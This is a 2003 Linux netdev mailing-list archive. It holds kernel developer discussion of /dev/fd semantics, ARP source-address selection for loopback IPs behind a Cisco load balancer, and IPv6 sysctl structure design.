ti21.telemetry-investments.com (8.11.6+Sun/8.11.6) id h6NNR6W00984; Wed, 23 Jul 2003 19:27:06 -0400 (EDT) Date: Wed, 23 Jul 2003 19:27:06 -0400 From: "Bill Rugolsky Jr." To: Alan Cox Cc: Glenn Fowler , davem@redhat.com, dgk@research.att.com, Linux Kernel Mailing List , netdev@oss.sgi.com Subject: Re: kernel bug in socketpair() Message-ID: <20030723192706.A962@ti21> Mail-Followup-To: "Bill Rugolsky Jr." , Alan Cox , Glenn Fowler , davem@redhat.com, dgk@research.att.com, Linux Kernel Mailing List , netdev@oss.sgi.com References: <200307231428.KAA15254@raptor.research.att.com> <20030723074615.25eea776.davem@redhat.com> <200307231656.MAA69129@raptor.research.att.com> <1058982641.5520.98.camel@dhcp22.swansea.linux.org.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <1058982641.5520.98.camel@dhcp22.swansea.linux.org.uk>; from alan@lxorguk.ukuu.org.uk on Wed, Jul 23, 2003 at 06:50:41PM +0100 X-archive-position: 4279 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: brugolsky@telemetry-investments.com Precedence: bulk X-list: netdev On Wed, Jul 23, 2003 at 06:50:41PM +0100, Alan Cox wrote: > > otherwise there is a bug in the /dev/fd/N -> /proc/self/fd/N implementation > > and /dev/fd/N should be separated out to its (original) dup(atoi(N)) > > semantics > > I don't see a bug. I see differing behaviour between Linux and BSD on a > completely non standards defined item. Also btw nobody ever really wrote > a /dev/fd/ for Linux - it was just a byproduct of the proc stuff someone > noticed. I guess someone could write a Plan-9 style dev/fd or devfdfs > for Linux if they wanted. I first posted about this several years ago, and it came up again earlier in the year; see: http://hypermail.idiosynkrasia.net/linux-kernel/archived/2003/week14/0314.html As HPA and I had previously discussed, ->open() methods always return a new file struct, so providing the dup() semantics would require a restructuring of the ->open() methods -- unless, (and this is a dirty hack,) one creates a devfdfs that abuses the ERESTART_RESTARTBLOCK mechanism to restart the open() syscall with dup() instead. This requires some minor pollution to the open() syscall path to interpret the error return, but should require no other changes. Regards, Bill Rugolsky From carlosev@newipnet.com Wed Jul 23 16:42:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 16:42:49 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NNfWFl007304 for ; Wed, 23 Jul 2003 16:42:14 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 6D63A207AB; Thu, 24 Jul 2003 01:41:31 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 9372520776; Thu, 24 Jul 2003 01:41:19 +0200 (CEST) Message-ID: <200307240134030339.1EADABD4@192.168.128.16> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 24 Jul 2003 01:34:03 +0200 From: "Carlos Velasco" To: "Julian Anastasov" Cc: netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6NNfWFl007304 X-archive-position: 4280 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 2:01 Julian Anastasov wrote: >> When linux machine tries to find out the mac address of 192.168.128.60 >with >> ARP, it uses the loopback IP address (lo:2) as source insted of the IP >address >> of the ethernet interface (eth0). > > You are right but the kernel tries to preserve the sender's >IP. This helps the receiver to select the best interface >to answer this ARP probe - the same where the IP packet will be >accepted later. As there are different setups, the tuning of the >ARP handling can be done better with user tools such as arptables >and iparp. Julian, The linux box is trying to do an ARP request with a source IP address that has not sense in that ethernet network. It's imposible to obtain a reply in that way. Although the receiver would have a route to the loopback address through ethernet interface it would never reply such a ARP request. IMHO it's a bug. Loopback IP address has not any sense on the eth0 network. Linux receives the packet destination loopback address and then performs a lookup in the route table to reach the src address. It takes the route (ex. default) and is on eth0 interface, then does the arp request. As the route is in eth0, it must use the src IP address of eth0, not the loopback address. If we have more than 1 IP address in eth0 (eth:0, eth:1) I suppose that the route table must distinguish the right interface for ARP. I have tried to reproduce the same problem with a Cisco router with IOS 12.2(15)T5, but it works fine in Cisco. I will try to test on Solaris 8, but I think the only problem is in linux. >http://sourceforge.net/projects/ebtables/ >http://www.ssi.bg/~ja/#iparp I didn't know about these tools. I have taken a look on them, but they seem to be used for arp filtering? I can't see how these tools can help me into this. My workaround with linux is to use static arps for solving this problem (arp -s). Regards, Carlos Velasco From davem@redhat.com Thu Jul 24 00:10:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 00:10:22 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6O7A5Fl009795 for ; Thu, 24 Jul 2003 00:10:07 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id AAA12347; Thu, 24 Jul 2003 00:07:05 -0700 Date: Thu, 24 Jul 2003 00:07:05 -0700 From: "David S. Miller" To: Krishna Kumar Cc: kuznet@ms2.inr.ac.ru, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: O/M flags against 2.6.0-test1 Message-Id: <20030724000705.4662df54.davem@redhat.com> In-Reply-To: <3F1F0CF7.5020909@us.ibm.com> References: <200307210155.FAA31320@dub.inr.ac.ru> <20030723031351.4e9db07c.davem@redhat.com> <3F1F0CF7.5020909@us.ibm.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4281 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 15:32:23 -0700 Krishna Kumar wrote: > > 1) Remove "void *sysctl;" from ipv6_devconf, move it into > > inet6_dev ie. "void *cnf_sysctl;" update all code users. > > There is one problem with this that I am not able to figure out, perhaps I am > overlooking it. addrconf_sysctl_register() gets called for ipv6_devconf_dflt, > but there is no inet6_dev for this configuration, so is it possible to move the > sysctl up (there is no 'up' :-). I don't want to create a dummy inet6_dev for > this. One way is to embed the actual config structure as follows : Another idea is to define the user structure: struct ipv6_user_devconf { __u32 forwarding; ... }; Then: struct ipv6_kernel_devconf { struct ipv6_user_devconf vals; void *sysctl; }; It is similar to what you suggest. > > 2) Move "struct ipv6_devconf" into some linux/*.h ipv6 header > > usable by users. Use an existing one if possible. Then > > make sure net/if_inet6.h includes this thing. > > The only two ipv6 specific files in linux are ipv6.h and > ipv6_route.h, neither are appropriate for sysctl stuff I think. So > should I create a new file like the one for ipv4_devconf exists in > inetdevice.h ? I see no reason why ipv6.h is a bad place, heck we have an in6_ifreq there already. > > 3) Change "int" members of struct "ipv6_devconf" to "s32". > > All members (except use_tempaddr) seem to be >=0, should I change > the definition to __u32 instead ? __u32 sounds fine. From bdschuym@pandora.be Thu Jul 24 03:02:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 03:02:12 -0700 (PDT) Received: from adicia.telenet-ops.be (adicia.telenet-ops.be [195.130.132.56]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OA1rFl029479 for ; Thu, 24 Jul 2003 03:01:55 -0700 Received: from localhost (localhost.localdomain [127.0.0.1]) by adicia.telenet-ops.be (Postfix) with SMTP id E14D537F44; Thu, 24 Jul 2003 11:31:04 +0200 (MEST) Received: from 192.168.123.138 (D5762BF0.kabel.telenet.be [213.118.43.240]) by adicia.telenet-ops.be (Postfix) with ESMTP id 57AD237F1B; Thu, 24 Jul 2003 11:30:54 +0200 (MEST) From: Bart De Schuymer To: "Carlos Velasco" , "Julian Anastasov" Subject: Re: Bug? ARP with wrong src IP address Date: Thu, 24 Jul 2003 11:30:53 +0200 User-Agent: KMail/1.5 Cc: netdev@oss.sgi.com References: <200307240134030339.1EADABD4@192.168.128.16> In-Reply-To: <200307240134030339.1EADABD4@192.168.128.16> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <200307241130.53262.bdschuym@pandora.be> X-archive-position: 4282 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bdschuym@pandora.be Precedence: bulk X-list: netdev On Thursday 24 July 2003 01:34, Carlos Velasco wrote: > >http://sourceforge.net/projects/ebtables/ > >http://www.ssi.bg/~ja/#iparp > > I didn't know about these tools. > I have taken a look on them, but they seem to be used for arp filtering? > I can't see how these tools can help me into this. arptables can mangle the arp payload with the "mangle" module. You'll need a very recent kernel for this, net/ipv4/netfilter/arpt_mangle.c must exist. The userspace code for this is in the CVS at the mentioned site, I haven't made a new release yet due to lack of time. cheers, Bart From carlosev@newipnet.com Thu Jul 24 03:46:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 03:46:25 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OAkIFl000849 for ; Thu, 24 Jul 2003 03:46:19 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 45990207B3; Thu, 24 Jul 2003 12:46:17 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 935BC20775; Thu, 24 Jul 2003 12:46:06 +0200 (CEST) Message-ID: <200307241238510034.210E4F24@192.168.128.16> In-Reply-To: <200307241130.53262.bdschuym@pandora.be> References: <200307240134030339.1EADABD4@192.168.128.16> <200307241130.53262.bdschuym@pandora.be> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 24 Jul 2003 12:38:51 +0200 From: "Carlos Velasco" To: "Bart De Schuymer" , "Julian Anastasov" Cc: netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6OAkIFl000849 X-archive-position: 4283 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 11:30 Bart De Schuymer wrote: >arptables can mangle the arp payload with the "mangle" module. You'll need >a >very recent kernel for this, net/ipv4/netfilter/arpt_mangle.c must exist. >The >userspace code for this is in the CVS at the mentioned site, I haven't >made a >new release yet due to lack of time. Thanks Bart, However I don't see how these tools can help in this ARP problem. There is no need of filtering or mangling arp, the problem is an incorrect arp being sent. Regards, Carlos Velasco From ja@ssi.bg Thu Jul 24 04:05:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 04:05:44 -0700 (PDT) Received: from l.himel.bg (IDENT:root@unamed.infotel.bg [212.39.68.18] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OB5LFl009918 for ; Thu, 24 Jul 2003 04:05:23 -0700 Received: from linux.himel.bg (IDENT:ja@linux.himel.bg [127.0.0.1]) by l.himel.bg (8.11.6/8.9.3) with ESMTP id h6OB4Hj06998; Thu, 24 Jul 2003 14:04:17 +0300 Date: Thu, 24 Jul 2003 14:04:17 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@l To: Carlos Velasco cc: Bart De Schuymer , Subject: Re: Bug? ARP with wrong src IP address In-Reply-To: <200307241238510034.210E4F24@192.168.128.16> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4284 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev Hello, On Thu, 24 Jul 2003, Carlos Velasco wrote: > On 24/07/2003 at 11:30 Bart De Schuymer wrote: > > However I don't see how these tools can help in this ARP problem. > There is no need of filtering or mangling arp, the problem is an incorrect arp being sent. The src IP in the ARP probe is a hint. In most of the cases it is ignored. But the receiver has the right to answer based on it. You know, the reply is sent to the sender's hwaddr, not to the src IP. Also, Linux always replies if the remote host asks for IP configured on loopback interface. So, there is no problem. If the remote system has your patch, there is also no problem. What kind of problems do you see except the loopback IP as sender IP? Dropped probes? Unanswered probes? > Regards, > Carlos Velasco Regards -- Julian Anastasov From kuznet@ms2.inr.ac.ru Thu Jul 24 07:02:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 07:03:08 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OE2vFl030469 for ; Thu, 24 Jul 2003 07:02:59 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id SAA09143; Thu, 24 Jul 2003 18:02:35 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307241402.SAA09143@dub.inr.ac.ru> Subject: Re: O/M flags against 2.6.0-test1 To: davem@redhat.com (David S. Miller) Date: Thu, 24 Jul 2003 18:02:35 +0400 (MSD) Cc: krkumar@us.ibm.com, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com In-Reply-To: <20030724000705.4662df54.davem@redhat.com> from "David S. Miller" at éÀÌ 24, 2003 12:07:05 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4285 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > Another idea is to define the user structure: Actually, I saw it just as array indexed by values from sysctl.h. Maybe, struct is better, but I am inclined to think in this case it is wrong. It is going to be extended, so newly compiled applications will see truncated structs from older kernels and will have to do ugly job verifying validity of fields using some offsetof. In the case of array it is natural at least. Alexey PS I know right way is not to change the struct. :-) It is another reason why I am still not sure that encoding sysctl values as separate subattributes is bad idea. From yoshfuji@linux-ipv6.org Thu Jul 24 07:24:42 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 07:24:49 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OEOfFl032650 for ; Thu, 24 Jul 2003 07:24:42 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6OEQMBo020867; Thu, 24 Jul 2003 23:26:22 +0900 Date: Thu, 24 Jul 2003 10:26:21 -0400 (EDT) Message-Id: <20030724.102621.89190471.yoshfuji@linux-ipv6.org> To: kuznet@ms2.inr.ac.ru Cc: davem@redhat.com, krkumar@us.ibm.com, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: O/M flags against 2.6.0-test1 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <200307241402.SAA09143@dub.inr.ac.ru> References: <20030724000705.4662df54.davem@redhat.com> <200307241402.SAA09143@dub.inr.ac.ru> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4286 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <200307241402.SAA09143@dub.inr.ac.ru> (at Thu, 24 Jul 2003 18:02:35 +0400 (MSD)), kuznet@ms2.inr.ac.ru says: > Maybe, struct is better, but I am inclined to think in this case it is wrong. > It is going to be extended, so newly compiled applications will see > truncated structs from older kernels and will have to do ugly job > verifying validity of fields using some offsetof. In the case of array > it is natural at least. I'm not so sure about the "array," but anyway, I don't think it is so ugly to use struct / offsetof. --yoshfuji From kuznet@ms2.inr.ac.ru Thu Jul 24 07:44:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 07:44:06 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OEi2Fl008825 for ; Thu, 24 Jul 2003 07:44:03 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id SAA09525; Thu, 24 Jul 2003 18:43:45 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307241443.SAA09525@dub.inr.ac.ru> Subject: Re: O/M flags against 2.6.0-test1 To: yoshfuji@linux-ipv6.org (YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=) Date: Thu, 24 Jul 2003 18:43:44 +0400 (MSD) Cc: davem@redhat.com, krkumar@us.ibm.com, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org In-Reply-To: <20030724.102621.89190471.yoshfuji@linux-ipv6.org> from "YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=" at éÀÌ 24, 2003 10:26:21 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4287 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > I'm not so sure about the "array," but anyway, > I don't think it is so ugly to use struct / offsetof. Just write a sample of code, printing all fields of struct and equivalent array, and you will see. Well, I just know, that when iproute will do this, it will cast the struct to array in any case. It is dirty, but sane at least. :-) Alexey From carlosev@newipnet.com Thu Jul 24 08:36:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 08:36:22 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OFa8Fl015955 for ; Thu, 24 Jul 2003 08:36:12 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 1BF2F20775; Thu, 24 Jul 2003 17:36:06 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id AAF75207B3; Thu, 24 Jul 2003 17:35:54 +0200 (CEST) Message-ID: <200307241728270476.0031BAB0@192.168.128.16> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 24 Jul 2003 17:28:27 +0200 From: "Carlos Velasco" To: "Julian Anastasov" Cc: "Bart De Schuymer" , netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6OFa8Fl015955 X-archive-position: 4288 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 14:04 Julian Anastasov wrote: > The src IP in the ARP probe is a hint. In most of the >cases it is ignored. But the receiver has the right to answer >based on it. You know, the reply is sent to the sender's hwaddr, >not to the src IP. Also, Linux always replies if the remote host asks >for IP configured on loopback interface. So, there is no problem. >If the remote system has your patch, there is also no problem. >What kind of problems do you see except the loopback IP as sender >IP? Dropped probes? Unanswered probes? Julian, The problem is more complicated than the simplified setting I have builded for describing the bug: Real setting and meaning of the lo interface is because I'm using IOS Load Balancing in dispatched mode on Cisco Catalyst 6500. This cause packets being sent to a server farm of Linux boxes with destination IP the one configured on the loopback interface in all machines. In the ethernet interface all Linux boxes have diferent IP address and the balancing device send the packets through any of these interfaces, choosing the "leastconnections" server. Thus, the load balancing device only change the mac address of the real packet on the fly sending it to one of the real servers where it's accepted cause of destination IP is the loopback IP address on every Linux machine. Problem is when the packet go back to the balancing device, as they send ARP request with loopback source IP address, that cause Cisco device not to reply the ARP request. I have tried different IOS and Cisco devices, no one reply this ARP request. As you have stated in your last e-mail I checked the RFC (if I'm not wrong it's rfc826) to see if when replying an ARP request the source IP address need to be correct and stepped into this: " ?Is the opcode ares_op$REQUEST? (NOW look at the opcode!!) Yes: Swap hardware and protocol fields, putting the local hardware and protocol addresses in the sender fields. Set the ar$op field to ares_op$REPLY Send the packet to the (new) target hardware address on the same hardware on which the request was received. " According to this, I think YOU ARE RIGHT and the source IP address should not be checked when replying to this ARP Request. I have setup another setting forcing a windows machine to be the default route of the linux box and see if windows OS replied to this ARP request... and IT DID. For now, I'm going to contact Cisco TAC and open a case to see if the bug is in Cisco IOS. Will keep you posted about this issue if you want to. Regards, Carlos Velasco From ja@ssi.bg Thu Jul 24 08:54:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 08:54:24 -0700 (PDT) Received: from l.himel.bg (IDENT:root@unamed.infotel.bg [212.39.68.18] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OFsHFl017902 for ; Thu, 24 Jul 2003 08:54:19 -0700 Received: from linux.himel.bg (IDENT:ja@linux.himel.bg [127.0.0.1]) by l.himel.bg (8.11.6/8.9.3) with ESMTP id h6OFs4j10456; Thu, 24 Jul 2003 18:54:04 +0300 Date: Thu, 24 Jul 2003 18:54:04 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@l To: Carlos Velasco cc: Bart De Schuymer , Subject: Re: Bug? ARP with wrong src IP address In-Reply-To: <200307241728270476.0031BAB0@192.168.128.16> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4289 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev Hello, On Thu, 24 Jul 2003, Carlos Velasco wrote: > The problem is more complicated than the simplified setting I have builded for describing the bug: > Real setting and meaning of the lo interface is because I'm using IOS Load Balancing in dispatched mode on Cisco Catalyst 6500. > This cause packets being sent to a server farm of Linux boxes with destination IP the one configured on the loopback interface in all machines. > In the ethernet interface all Linux boxes have diferent IP address and the balancing device send the packets through any of these interfaces, choosing the "leastconnections" server. > Thus, the load balancing device only change the mac address of the real packet on the fly sending it to one of the real servers where it's accepted cause of destination IP is the loopback IP address on every Linux machine. > > Problem is when the packet go back to the balancing device, as they send ARP request with loopback source IP address, that cause Cisco device not to reply the ARP request. > I have tried different IOS and Cisco devices, no one reply this ARP request. I now see, it is the so called "ARP Problem" in the IPVS context, many real servers and one director sharing same virtual IP: http://www.linuxvirtualserver.org/ The most used feature for such setups: http://www.ssi.bg/~ja/#hidden > Regards, > Carlos Velasco Regards -- Julian Anastasov From davem@redhat.com Thu Jul 24 09:12:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 09:12:59 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OGCmFl020044 for ; Thu, 24 Jul 2003 09:12:55 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id JAA13346; Thu, 24 Jul 2003 09:10:08 -0700 Date: Thu, 24 Jul 2003 09:10:07 -0700 From: "David S. Miller" To: Julian Anastasov Cc: carlosev@newipnet.com, bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Message-Id: <20030724091007.68923845.davem@redhat.com> In-Reply-To: References: <200307241728270476.0031BAB0@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4290 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Thu, 24 Jul 2003 18:54:04 +0300 (EEST) Julian Anastasov wrote: > The most used feature for such setups: > http://www.ssi.bg/~ja/#hidden The hidden patch is not necessary with current kernels and arpfilter. From carlosev@newipnet.com Thu Jul 24 09:15:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 09:15:47 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OGFfFl020768 for ; Thu, 24 Jul 2003 09:15:41 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 9A59420775; Thu, 24 Jul 2003 18:15:39 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 4533B207B3; Thu, 24 Jul 2003 18:15:28 +0200 (CEST) Message-ID: <200307241804140253.00527C89@192.168.128.16> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 24 Jul 2003 18:04:14 +0200 From: "Carlos Velasco" To: "Julian Anastasov" Cc: "Bart De Schuymer" , netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6OGFfFl020768 X-archive-position: 4291 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 18:54 Julian Anastasov wrote: > I now see, it is the so called "ARP Problem" in the IPVS >context, many real servers and one director sharing same virtual >IP: > >http://www.linuxvirtualserver.org/ > >The most used feature for such setups: >http://www.ssi.bg/~ja/#hidden Julian, This would be another approach, configuring the IP address on the ethernet interface (ex. eth0:2) and not advertising or replying arp with the hidden patch. However the usual approach is configuring the destination IP address on a loopback interface that does real "hiding" as it's no more in ethernet interface. Dispatched mode: http://www.cisco.com/en/US/products/sw/iosswrel/ps1833/products_feature_guide09186a0080086f2b.html#2728293 As long as I know, Solaris 8 and Windows 2000 have no problems with the ARP Request, as they use the src IP address of the ethernet interface. But as I have seen in the RFC it seems that Cisco devices should reply to this ARP request without looking into the source ip address. I will open a TAC case and see if they raise a bug. Regards, Carlos Velasco From ja@ssi.bg Thu Jul 24 09:33:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 09:33:22 -0700 (PDT) Received: from l.himel.bg (IDENT:root@unamed.infotel.bg [212.39.68.18] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OGXEFl023468 for ; Thu, 24 Jul 2003 09:33:16 -0700 Received: from linux.himel.bg (IDENT:ja@linux.himel.bg [127.0.0.1]) by l.himel.bg (8.11.6/8.9.3) with ESMTP id h6OGWtj10808; Thu, 24 Jul 2003 19:32:55 +0300 Date: Thu, 24 Jul 2003 19:32:55 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@l To: Carlos Velasco cc: Bart De Schuymer , Subject: Re: Bug? ARP with wrong src IP address In-Reply-To: <200307241804140253.00527C89@192.168.128.16> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4292 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev Hello, On Thu, 24 Jul 2003, Carlos Velasco wrote: > This would be another approach, configuring the IP address on the > ethernet interface (ex. eth0:2) and not advertising or replying arp with > the hidden patch. > However the usual approach is configuring the destination IP address on > a loopback interface that does real "hiding" as it's no more in ethernet > interface. The Linux concept differs. As for hidden, it works for different interface, not for the one where the probe is received. The alias names do not play here. > As long as I know, Solaris 8 and Windows 2000 have no problems with the > ARP Request, as they use the src IP address of the ethernet interface. > But as I have seen in the RFC it seems that Cisco devices should reply > to this ARP request without looking into the source ip address. There are some exceptions for the src IP. Even Linux will not 